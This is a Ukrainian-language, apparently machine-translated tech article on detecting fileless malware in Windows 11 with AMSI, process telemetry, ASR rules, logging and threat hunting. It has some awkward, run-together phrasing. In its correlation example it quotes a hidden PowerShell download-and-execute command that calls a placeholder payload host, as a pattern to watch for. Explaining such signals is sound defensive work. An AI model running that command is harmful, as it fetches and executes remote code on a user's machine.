- Безфайлове шкідливе програмне забезпечення працює в пам'яті та зловживає легітимними процесами, такими як PowerShell та WMI.
- Ефективне виявлення вимагає моніторингу поведінки та аналізу пам'яті, а не лише файлів.
- AMSI, телеметрія процесів, правила зменшення поверхні та проактивне пошукування – це ключові функції Windows 11.
- Збереження WMI, реєстру та MBR, разом із прошивкою та USB, розширює поверхню атаки.
¿Як виявити небезпечне безфайлове шкідливе програмне забезпечення? Активність безфайлових атак значно зросла, і що ще гірше, Windows 11 не застрахованийТакий підхід обходить диск і покладається на пам'ять і легітимні системні інструменти; саме тому антивірусні програми на основі сигнатур мають труднощі. Якщо ви шукаєте надійний спосіб його виявлення, відповідь полягає в поєднанні телеметрія, аналіз поведінки та елементи керування Windows.
У сучасній екосистемі кампанії, що зловживають PowerShell, WMI або Mshta, співіснують із більш складними методами, такими як ін'єкції пам'яті, збереження даних "без дотику" до диска та навіть зловживання прошивкоюКлюч полягає в розумінні карти загроз, фаз атаки та того, які сигнали вони залишають, навіть коли все відбувається в оперативній пам'яті.
Що таке безфайлове шкідливе програмне забезпечення та чому воно викликає занепокоєння у Windows 11?
Коли ми говоримо про «безфайлові» загрози, ми маємо на увазі шкідливий код, який Вам не потрібно розміщувати нові виконувані файли у файловій системі для роботи. Зазвичай він вводиться в запущені процеси та виконується в оперативній пам'яті, спираючись на інтерпретатори та бінарні файли, підписані Microsoft (наприклад, PowerShell, WMI, rundll32, mshtaЦе зменшує ваш вплив і дозволяє обійти пошукові системи, які шукають лише підозрілі файли.
Навіть офісні документи або PDF-файли, які використовують вразливості для запуску команд, вважаються частиною цього явища, оскільки активувати виконання в пам'яті не залишаючи корисних бінарних файлів для аналізу. Зловживання макроси та DDE В Office, оскільки код виконується в легітимних процесах, таких як WinWord.
Зловмисники поєднують соціальну інженерію (фішинг, спам-посилання) з технічними пастками: клік користувача ініціює ланцюжок, у якому скрипт завантажує та виконує кінцеве корисне навантаження в пам'яті, уникаючи залишення слідів на диску. Цілі варіюються від крадіжки даних до виконання програм-вимагачів та тихого переміщення вбік.

Типології за місцем розташування в системі: від «чистих» до гібридних
Щоб уникнути плутанини, корисно розділяти загрози за ступенем їхньої взаємодії з файловою системою. Така категоризація пояснює що зберігається, де знаходиться код і які сліди він залишає?.
Тип I: немає активності файлів
Зловмисне програмне забезпечення, повністю без файлів, нічого не записує на диск. Класичним прикладом є використання вразливість мережі (як-от вектор EternalBlue колись) для реалізації бекдору, що знаходиться в пам'яті ядра (випадки типу DoublePulsar). Тут все відбувається в оперативній пам'яті, і у файловій системі немає артефактів.
Інший варіант — забруднити Firmware компонентів: BIOS/UEFI, мережевих адаптерів, USB-периферійних пристроїв (методи типу BadUSB) або навіть підсистем процесора. Вони зберігаються після перезавантажень та повторних інсталяцій, що створює додаткові труднощі, пов'язані з Мало які продукти перевіряють прошивкуЦе складні атаки, менш часті, але небезпечні завдяки своїй скритності та стійкості.
Тип II: Непряма архівна діяльність
Тут шкідливе програмне забезпечення не «залишає» власний виконуваний файл, а використовує контейнери, керовані системою, які по суті зберігаються у вигляді файлів. Наприклад, бекдори, що встановлюють команди PowerShell у репозиторії WMI та запускати його виконання за допомогою фільтрів подій. Його можна встановити з командного рядка, не видаляючи бінарні файли, але репозиторій WMI знаходиться на диску як легітимна база даних, що ускладнює його очищення без впливу на систему.
З практичної точки зору вони вважаються безфайловими, оскільки цей контейнер (WMI, реєстр тощо) Це не класичний виявлюваний виконуваний файл І його очищення не є тривіальним. Результат: непомітна стійкість з невеликою кількістю «традиційних» слідів.
Тип III: Для функціонування потрібні файли
У деяких випадках зберігається «безфайлова» стійкість На логічному рівні їм потрібен тригер на основі файлу. Типовим прикладом є Kovter: він реєструє команду оболонки для випадкового розширення; коли відкривається файл із цим розширенням, запускається невеликий скрипт, що використовує mshta.exe, який реконструює шкідливий рядок з реєстру.
Хитрощі полягають у тому, що ці файли-"приманки" з випадковими розширеннями не містять корисного навантаження, яке можна аналізувати, а основна частина коду знаходиться в реєстрація (інший контейнер). Ось чому їх класифікують як безфайлові за впливом, хоча, строго кажучи, вони залежать від одного або кількох артефактів диска як тригера.
Переносники та «господарі» інфекції: куди вона проникає і де ховається
Для покращення виявлення життєво важливо визначити точку входу та хазяїна інфекції. Ця перспектива допомагає розробити спеціальні засоби контролю Надайте пріоритет відповідній телеметрії.
подвиги
- На основі файлів (Тип III): Документи, виконувані файли, застарілі файли Flash/Java або LNK-файли можуть використовувати браузер або механізм, який їх обробляє, для завантаження шелл-коду в пам'ять. Перший вектор – це файл, але корисне навантаження переміщується в оперативну пам'ять.
- Мережевий (Тип I): Пакет, що використовує вразливість (наприклад, в SMB), досягає виконання в області користувача або ядрі. WannaCry популяризував цей підхід. Пряме завантаження пам'яті без нового файлу.
Обладнання
- Пристрої (Тип I): Прошивку диска або мережевої карти можна змінювати, а також вносити код. Важко перевірити та зберігається поза межами ОС.
- Процесор та підсистеми управління (Тип I): Такі технології, як ME/AMT від Intel, продемонстрували шляхи до Мережева робота та виконання поза ОСВін атакує на дуже низькому рівні, з високим потенціалом скритності.
- USB (Тип I): BadUSB дозволяє перепрограмувати USB-накопичувач, щоб він видавав себе за клавіатуру або мережеву карту та запускав команди або перенаправляв трафік.
- BIOS / UEFI (Тип I): перепрограмування шкідливої прошивки (випадки, подібні до Mebromi), яке запускається до завантаження Windows.
- Гіпервізор (Тип I): Реалізація міні-гіпервізора під ОС для приховування його присутності. Рідкісне явище, але вже спостерігається у вигляді руткітів гіпервізора.
Виконання та ін'єкція
- На основі файлів (Тип III): EXE/DLL/LNK або заплановані завдання, що запускають ін'єкції в легітимні процеси.
- Макрос (Тип III): VBA в Office може декодувати та виконувати корисні навантаження, включаючи повноцінне програмне забезпечення-вимагач, за згодою користувача шляхом обману.
- Сценарії (Тип II): PowerShell, VBScript або JScript з файлу, командного рядка, послуги, реєстрація або WMIЗловмисник може ввести скрипт у віддаленому сеансі, не торкаючись диска.
- Запис завантаження (MBR/Boot) (Тип II): Сімейства, подібні до Petya, перезаписують завантажувальний сектор, щоб отримати контроль під час запуску. Він знаходиться поза файловою системою, але доступний для ОС та сучасних рішень, які можуть його відновити.
Як працюють безфайлові атаки: фази та сигнали
Хоча вони не залишають виконуваних файлів, кампанії дотримуються поетапної логіки. Розуміння їх дозволяє здійснювати моніторинг. події та зв'язки між процесами які залишають слід.
- Початковий доступФішингові атаки з використанням посилань або вкладень, скомпрометованих веб-сайтів або викрадених облікових даних. Багато ланцюжків починаються з документа Office, який запускає команду. PowerShell.
- Наполегливість: бекдори через WMI (фільтри та підписки), Ключі виконання реєстру або заплановані завдання, які перезапускають скрипти без нового шкідливого файлу.
- ЕксфільтраціяПісля збору інформації вона надсилається з мережі за допомогою довірених процесів (браузери, PowerShell, bitsadmin) для змішування трафіку.
Ця закономірність особливо підступна, оскільки індикатори атаки Вони ховаються у звичайному житті: аргументи командного рядка, ланцюжки процесів, аномальні вихідні з'єднання або доступ до API ін'єкцій.
Поширені методи: від пам'яті до запису
Актори покладаються на низку методи що оптимізують прихованість. Корисно знати найпоширеніші з них, щоб активувати ефективне виявлення.
- Мешканець у пам'ятіЗавантаження корисних навантажень у простір довіреного процесу, який очікує активації. руткіти та гачки У ядрі вони підвищують рівень приховування.
- Збереження в реєстріЗберігайте зашифровані блоби в ключах та регідратуйте їх з легітимного лаунчера (mshta, rundll32, wscript). Тимчасовий інсталятор може самознищитися, щоб мінімізувати свій вплив.
- Фішинг облікових данихВикористовуючи викрадені імена користувачів та паролі, зловмисник виконує віддалені оболонки та установки. тихий доступ у реєстрі або WMI.
- Програма-вимагач без файлівШифрування та зв'язок C2 організовані з оперативної пам'яті, що зменшує можливості виявлення, доки пошкодження не стане видимим.
- Операційні комплекти: автоматизовані ланцюжки, які виявляють вразливості та розгортають корисні навантаження, що займають лише пам'ять, після того, як користувач клацає.
- Документи з кодоммакроси та механізми, такі як DDE, що запускають команди без збереження виконуваних файлів на диску.
Галузеві дослідження вже показали помітні піки: в один із періодів 2018 року збільшення понад 90% у атаках на основі скриптів та ланцюгових атаках PowerShell, що свідчить про те, що вектор є кращим за свою ефективність.
Виклик для компаній та постачальників: чому блокування недостатньо
Було б спокусливо вимкнути PowerShell або заборонити макроси назавжди, але Ви б зірвали операціюPowerShell є основою сучасного адміністрування, а Office є важливим у бізнесі; сліпе блокування часто неможливе.
Крім того, існують способи обійти основні елементи керування: запуск PowerShell через DLL та rundll32, пакування скриптів у EXE-файли, Принесіть власну копію PowerShell або навіть приховувати скрипти в зображеннях та витягувати їх у пам'ять. Тому захист не може ґрунтуватися виключно на запереченні існування інструментів.
Ще однією поширеною помилкою є делегування всього рішення хмарі: якщо агенту доводиться чекати на відповідь від сервера, Ви втрачаєте можливість запобігання в режимі реального часуДані телеметрії можна завантажувати для збагачення інформації, але Пом'якшення має відбуватися в кінцевій точці.
Як виявити безфайлове шкідливе програмне забезпечення у Windows 11: телеметрія та поведінка
Виграшна стратегія полягає в тому, моніторинг процесів і пам'ятіНе файли. Шкідлива поведінка стабільніша, ніж форми, які приймає файл, що робить її ідеальною для механізмів запобігання.
- AMSI (інтерфейс сканування антивірусних програм)Він перехоплює скрипти PowerShell, VBScript або JScript, навіть якщо вони динамічно створюються в пам'яті. Чудово підходить для захоплення обфускованих рядків перед виконанням.
- Моніторинг процесівстарт/фініш, PID, батьки та діти, маршрути, командні рядки і хеші, а також дерева виконання, щоб зрозуміти повну історію.
- Аналіз пам'яті: виявлення ін'єкцій, відбивних або поліелементних навантажень без дотику до диска та перегляд незвичайних виконуваних областей.
- Захист сектора стартера: контроль та відновлення MBR/EFI у разі втручання.
В екосистемі Microsoft Defender for Endpoint поєднує AMSI, моніторинг поведінкиСканування пам'яті та хмарне машинне навчання використовуються для масштабування виявлення нових або обфускованих варіантів. Інші постачальники застосовують подібні підходи з резидентними двигунами ядра.
Реалістичний приклад кореляції: від документа до PowerShell
Уявіть собі ланцюжок, де Outlook завантажує вкладення, Word відкриває документ, активний вміст увімкнено, а PowerShell запущено з підозрілими параметрами. Належна телеметрія покаже… Командний рядок (наприклад, обхід ExecutionPolicy, приховане вікно), підключення до ненадійного домену та створення дочірнього процесу, який встановлюється в AppData.
Агент з локальним контекстом здатний зупинка та реверс шкідливої діяльності без ручного втручання, на додаток до повідомлення SIEM або електронною поштою/SMS. Деякі продукти додають рівень атрибуції першопричини (моделі типу StoryLine), який вказує не на видимий процес (Outlook/Word), а на повний шкідливий потік та його походження для комплексного очищення системи.
Типовий шаблон команди, на який варто звернути увагу, може виглядати так: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Логіка не є точним рядком, але набір сигналів: обхід політик, приховане вікно, очищення завантаження та виконання в пам'яті.
AMSI, конвеєр та роль кожного актора: від кінцевої точки до SOC
Окрім захоплення сценаріїв, надійна архітектура організовує кроки, що сприяють розслідуванню та реагуванню. Чим більше доказів перед виконанням навантаження, тим краще.краще
- Перехоплення скриптівAMSI надає контент (навіть якщо він генерується на льоту) для статичного та динамічного аналізу в конвеєрі шкідливого програмного забезпечення.
- Події процесуЗбираються PID, бінарні файли, хеші, маршрути та інші дані. аргументи, встановлюючи дерева процесів, що призвели до остаточного завантаження.
- Виявлення та звітністьВиявлення відображаються на консолі продукту та пересилаються на мережеві платформи (NDR) для візуалізації кампанії.
- Гарантії користувачаНавіть якщо скрипт вводиться в пам'ять, фреймворк AMSI перехоплює його у сумісних версіях Windows.
- Можливості адміністратора: конфігурація політики для ввімкнення перевірки скриптів, блокування на основі поведінки та створення звітів з консолі.
- Робота СОЦ: вилучення артефактів (VM UUID, версія ОС, тип скрипта, процес-ініціатор та його батьківський процес, хеші та командні рядки) для відтворення історії та правила підйому майбутнє.
Коли платформа дозволяє експортувати буфер пам'яті Пов'язано з виконанням, дослідники можуть генерувати нові виявлення та збагачувати захист від подібних варіантів.
Практичні заходи у Windows 11: профілактика та полювання

Окрім EDR з перевіркою пам'яті та AMSI, Windows 11 дозволяє закривати зони атаки та покращувати видимість за допомогою вбудовані елементи керування.
- Реєстрація та обмеження в PowerShellВмикає ведення журналу блоків скриптів та ведення журналу модулів, застосовує обмежені режими, де це можливо, та контролює використання Обхід/Прихований.
- Правила зменшення поверхні атаки (ASR): блокує запуск скриптів процесами Office та Зловживання WMI/PSExec, коли не потрібен.
- Політики макросів Office: за замовчуванням вимикає внутрішнє підписування макросів та списки суворої довіри; контролює застарілі потоки DDE.
- Аудит WMI та реєстр: відстежує підписки на події та ключі автоматичного виконання (Run, RunOnce, Winlogon), а також створення завдань за розкладом.
- Захист запуску: активує безпечне завантаження, перевіряє цілісність MBR/EFI та підтверджує відсутність змін під час запуску.
- Латування та зміцнення: закриває вразливості, що піддаються використанню, у браузерах, компонентах Office та мережевих службах.
- обізнаність: навчає користувачів та технічні команди фішингу та сигналам таємні страти.
Для пошуку зосередьтеся на запитах щодо: створення процесів Office для PowerShell/MSHTA, аргументи з рядок завантаження/файл завантаженняСкрипти з чітким обфускацією, рефлективними ін'єкціями та вихідними мережами до підозрілих TLD. Зіставте ці сигнали з репутацією та частотою, щоб зменшити шум.
Що може виявити кожен двигун сьогодні?
Корпоративні рішення Microsoft поєднують AMSI, поведінкову аналітику, дослідити пам'ять захист завантажувального сектора, а також хмарні моделі машинного навчання для масштабування проти нових загроз. Інші постачальники впроваджують моніторинг на рівні ядра, щоб відрізняти шкідливе програмне забезпечення від безпечного з автоматичним відкатом змін.
Підхід, що базується на історії страт Це дозволяє визначити першопричину (наприклад, вкладення Outlook, яке запускає ланцюжок) та усунути проблеми з усім деревом: скриптами, ключами, завданнями та проміжними бінарними файлами, уникаючи зациклення на видимому симптомі.
Поширені помилки та як їх уникнути

Блокування PowerShell без альтернативного плану управління не тільки непрактичне, але й... способи його непрямого викликуТе саме стосується макросів: або ви керуєте ними за допомогою політик та підписів, або бізнес постраждає. Краще зосередитися на телеметрії та поведінкових правилах.
Ще однією поширеною помилкою є переконання, що додавання програм до білого списку вирішує все: технологія безфайлового доступу спирається саме на це. довірені програмиКонтроль повинен спостерігати за тим, що вони роблять і як вони пов'язані між собою, а не лише за тим, чи їм це дозволено.
З огляду на все вищезазначене, безфайлове шкідливе програмне забезпечення перестає бути «привидом», коли ви відстежуєте те, що дійсно важливо: поведінка, пам'ять та походження кожного виконання. Поєднання AMSI, розширеної телеметрії процесів, вбудованих елементів керування Windows 11 та рівня EDR з аналізом поведінки дає вам перевагу. Додайте до рівняння реалістичні політики для макросів та PowerShell, аудит WMI/реєстру та пошук, який надає пріоритет командним рядкам і деревам процесів, і ви отримаєте захист, який розриває ці ланцюги, перш ніж вони видадуть звук.
Захоплювався технікою з дитинства. Я люблю бути в курсі подій у секторі та, перш за все, повідомляти про це. Ось чому я вже багато років присвячую комунікації на веб-сайтах технологій і відеоігор. Ви можете знайти, як я пишу про Android, Windows, MacOS, iOS, Nintendo або будь-яку іншу пов’язану тему, яка спадає вам на думку.